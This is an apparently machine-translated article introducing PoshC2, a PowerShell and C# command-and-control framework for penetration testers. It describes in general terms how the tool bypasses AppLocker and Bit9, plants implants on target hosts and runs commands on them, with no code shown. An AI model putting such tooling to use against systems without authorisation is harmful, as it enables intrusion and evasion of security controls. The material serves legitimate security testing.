How to use PowerShell to implement command control and bypass security checking

Windows operating system in the global market share is obvious to all, and the modern Windows platform are installed by default PowerShell, and system administrators can also access and use PowerShell terminal unlimited. Everything else, so many of the current security penetration tools are written using PowerShell. But we also have to pay attention, PowerShell these features also make it a network of criminals is a favorite tool.

BenTurner and Dave Hardy, two security researchers, developed a PowerShell and C # command control tool, PoshC2, which not only implements a variety of attack techniques but is also very easy to use. The most important feature of PoshC2 is that it can bypass the various security checks deployed on the target host.

Download PoshC2

Usage

Install PoshC2

PoshC2 provides communication data encryption, and only eight steps of simple operation can be fully configured PoshC2. PoshC2 configuration interface is as follows:

Once the configuration is complete, the tool lists all the technologies it can implement, and the penetration tester can use PoshC2 to bypass the AppLocker, Bit9, or download the implant program to the target host via PowerShell.

PoshC2 can also generate a variety of powerful Payload, the researchers can be in the penetration test or security assessment process to use this Payload.

The Implant Handler terminal will open when the implant program is successfully downloaded and installed on the target host, which handles the interaction between the implantation program and the C2 server and executes the command on the target host.

Similar to the PowerShell session, it can also receive any PowerShell commands or PoshC2 commands. The related commands can be found in the help menu:

PoshC2’s implantation program also contains a number of other techniques that researchers can use to extract information, achieve mentioning or collecting host/domain information. Here are some of the infiltration techniques:

Note: The tool also provides a graphical user interface, but the user needs to install the .NET Framework v4.03019. In addition, the tool’s output data can also be saved as an HTML file format.

The biggest advantage of PoshC2 is that it uses PowerShell, so it’s implanted do not require any other dependencies, which are similar to many other command control tools developed in Python. In addition, it is running very fast and efficient, the stability is very high, and the output information is also very detailed.

In summary, PoshC2 certainly can give the majority of penetration test personnel to bring a very big help.

Reference:

  1. https://labs.nettitude.com/blog/poshc2-new-features/

     

  2. https://labs.nettitude.com/blog/release-of-nettitudes-poshc2/

     

  3. https://labs.nettitude.com/tools/poshc2/

     

  4. https://github.com/nettitude/PoshC2
  5. https://pentestlab.blog/2017/08/19/command-and-control-powershell/